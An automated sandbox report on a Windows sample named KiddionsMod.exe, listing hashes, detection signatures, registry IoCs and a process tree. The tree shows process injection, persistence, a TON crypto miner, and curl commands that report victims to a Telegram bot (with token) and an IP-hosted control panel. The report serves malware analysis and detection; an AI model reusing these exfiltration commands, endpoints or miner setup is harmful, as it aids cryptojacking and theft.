Analysis
- max time kernel: 156s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 19-01-2022 21:45
Static task: static1
Behavioral task: behavioral1
Sample: KiddionsMod.exe
Resource: win7-en-20211208
General
- Target: KiddionsMod.exe
- Size: 1.3MB
- MD5: 19cfd5a417830805d328cc9e09dc14c1
- SHA1: 836b391c349ae25da63c33438aa6a8f4b1e10748
- SHA256: cb69d24dbd59161cdbc6483fe59b0fc5cec108973d5a20a0636370e7c27ab201
- SHA512: 1b2cf065b606d65e2253fda80c15848d80d3a1e0b5ab11f3cb3b73864704ca90a8d99d6e92ca45b95269dc04612822883ea87eb31da5fcd5fd992a02ab36546b
Malware Config
Signatures
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
pid   process
2756  loader.exe
3908  RegHost.exe
1544  RegHost.exe
1720  RegHost.exe
2856  RegHost.exe
3100  asf3r3.exe
2412  e3dwefw.exe
2928  RegHost.exe
2368  RegHost.exe
3060  RegHost.exe
3900  oobeldr.exe
2580  RegHost.exe
1284  RegHost.exe
-
Sets service image path in registry 2 TTPs
-
Processes:
resource                                                                      yara_rule
behavioral2/memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmp  upx
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                             process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  loader.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   loader.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   RegHost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  RegHost.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                     process
Key value queried  \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation  RegAsm.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource                                                                      yara_rule
C:\Users\Admin\AppData\Local\Temp\loader.exe                                  themida
C:\Users\Admin\AppData\Local\Temp\loader.exe                                  themida
behavioral2/memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  themida
behavioral2/memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  themida
behavioral2/memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe                          themida
behavioral2/memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
behavioral2/memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmp  themida
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
description      ioc                                                                                                                                     process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  loader.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"  RegHost.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description        ioc                                                                            process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  loader.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  RegHost.exe
-
Suspicious use of SetThreadContext 21 IoCs
Processes:
description                           pid   process          target process
PID 2828 set thread context of 3084   2828  KiddionsMod.exe  RegAsm.exe
PID 2756 set thread context of 2772   2756  loader.exe       bfsvc.exe
PID 2756 set thread context of 1484   2756  loader.exe       explorer.exe
PID 3908 set thread context of 2828   3908  RegHost.exe      bfsvc.exe
PID 3908 set thread context of 556    3908  RegHost.exe      explorer.exe
PID 1544 set thread context of 756    1544  RegHost.exe      bfsvc.exe
PID 1544 set thread context of 1420   1544  RegHost.exe      explorer.exe
PID 1720 set thread context of 1956   1720  RegHost.exe      bfsvc.exe
PID 1720 set thread context of 224    1720  RegHost.exe      explorer.exe
PID 2856 set thread context of 3392   2856  RegHost.exe      bfsvc.exe
PID 2856 set thread context of 3024   2856  RegHost.exe      explorer.exe
PID 2928 set thread context of 1944   2928  RegHost.exe      bfsvc.exe
PID 2928 set thread context of 3300   2928  RegHost.exe      explorer.exe
PID 2368 set thread context of 220    2368  RegHost.exe      bfsvc.exe
PID 2368 set thread context of 2016   2368  RegHost.exe      explorer.exe
PID 3060 set thread context of 3580   3060  RegHost.exe      bfsvc.exe
PID 3060 set thread context of 1340   3060  RegHost.exe      explorer.exe
PID 2580 set thread context of 2376   2580  RegHost.exe      bfsvc.exe
PID 2580 set thread context of 904    2580  RegHost.exe      explorer.exe
PID 1284 set thread context of 2732   1284  RegHost.exe      bfsvc.exe
PID 1284 set thread context of 3964   1284  RegHost.exe      explorer.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc                                                                               process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      RegAsm.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  RegAsm.exe
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
description  ioc  process
All 41 entries have description "Key created" and process WaaSMedicAgent.exe; the keys, in the order listed:
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid   process
3084  RegAsm.exe    (3 entries)
1484  explorer.exe  (repeated entries, collapsed)
556   explorer.exe  (repeated entries, collapsed)
1420  explorer.exe  (1 entry)
(64 IoCs in total, as the signature heading states; identical consecutive rows are collapsed here.)
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
description                        pid   process
Token: SeDebugPrivilege            3084  RegAsm.exe
Token: SeSystemtimePrivilege       1836  svchost.exe
Token: SeSystemtimePrivilege       1836  svchost.exe
Token: SeIncBasePriorityPrivilege  1836  svchost.exe
Token: SeSystemtimePrivilege       1836  svchost.exe
Token: SeSystemtimePrivilege       1160  svchost.exe
Token: SeSystemtimePrivilege       1160  svchost.exe
Token: SeIncBasePriorityPrivilege  1160  svchost.exe
Token: SeDebugPrivilege            3100  asf3r3.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                       pid   process          target process
PID 2828 wrote to memory of 3084  2828  KiddionsMod.exe  RegAsm.exe    (8 entries)
PID 3084 wrote to memory of 2756  3084  RegAsm.exe       loader.exe    (2 entries)
PID 2756 wrote to memory of 4020  2756  loader.exe       curl.exe      (2 entries)
PID 2756 wrote to memory of 2772  2756  loader.exe       bfsvc.exe     (9 entries)
PID 2756 wrote to memory of 1484  2756  loader.exe       explorer.exe  (17 entries)
PID 1484 wrote to memory of 2016  1484  explorer.exe     curl.exe      (2 entries)
PID 1484 wrote to memory of 3908  1484  explorer.exe     RegHost.exe   (2 entries)
PID 3908 wrote to memory of 2828  3908  RegHost.exe      bfsvc.exe     (9 entries)
PID 3908 wrote to memory of 556   3908  RegHost.exe      explorer.exe  (13 entries)
(64 IoCs in total; identical consecutive rows are collapsed here with their counts.)
Processes
-
C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"C:\Users\Admin\AppData\Local\Temp\KiddionsMod.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\curl.execurl "https://api.telegram.org/bot5080602212:AAFzGPp7yFVoPgAstCfae6JTAOpzgmOhueI/sendMessage?chat_id=-1001744615146&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: Krutoi"4⤵
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"5⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX6⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"7⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"9⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX10⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"10⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"11⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX12⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"12⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"13⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"14⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"15⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX16⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"16⤵
-
C:\Windows\SYSTEM32\curl.execurl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"17⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX18⤵
-
[tree depth 18] C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
-
[tree depth 19] C:\Windows\SYSTEM32\curl.exe
  command line: curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
-
[tree depth 19] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  command line: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
[tree depth 20] C:\Windows\bfsvc.exe
  command line: C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
-
[tree depth 20] C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
-
[tree depth 21] C:\Windows\SYSTEM32\curl.exe
  command line: curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
-
[tree depth 21] C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
  command line: "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
[tree depth 22] C:\Windows\bfsvc.exe
  command line: C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX
-
[tree depth 22] C:\Windows\explorer.exe
  command line: C:\Windows\explorer.exe "dragneysterhardsys123" "Microsoft%20Basic%20Display%20Adapter" "Krutoi" "ton"
-
[tree depth 23] C:\Windows\SYSTEM32\curl.exe
  command line: curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"
-
[tree depth 3] C:\Users\Admin\AppData\Roaming\asf3r3.exe
  command line: "C:\Users\Admin\AppData\Roaming\asf3r3.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
[tree depth 3] C:\Users\Admin\AppData\Roaming\e3dwefw.exe
  command line: "C:\Users\Admin\AppData\Roaming\e3dwefw.exe"
- Executes dropped EXE
-
[tree depth 4] C:\Windows\SysWOW64\schtasks.exe
  command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
-
[tree depth 1] C:\Windows\System32\WaaSMedicAgent.exe
  command line: C:\Windows\System32\WaaSMedicAgent.exe dc10dc428c424782dfda32cfa06f8fbf oWLZ1E4gW0a9DAkkf1GvUg.0.1.0.0.0
- Modifies data under HKEY_USERS
-
